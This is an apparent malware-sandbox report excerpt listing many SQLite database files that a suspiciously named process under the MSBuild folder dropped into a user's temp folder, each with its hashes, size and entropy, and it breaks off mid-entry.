                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\E7QyLMMMgO

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\E9Zmz9mwMT

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\ERzqfi33id

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\GFbzPGSdgP

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\GlX3F3zFgc

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\Grc4noUDrJ

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\HSZ8zIATHv

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\HUosQUZAD4

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\HhhHmrI5sG

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\IkVR5JvxTE

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\IpCFBQp7Hn

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\IsH2sqAW5J

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\J1oUr1QhvC

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\JGkWXQ1LDH

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\JcPguYzfMN

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\Jov5bgW2Mu

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\KU10zFjbxM

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\KWCtF89JJr

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\KjCQkbyzHX

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\LBsjFsbL39

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\LHHB1t8AXe

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\Lgf7mHanUj

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
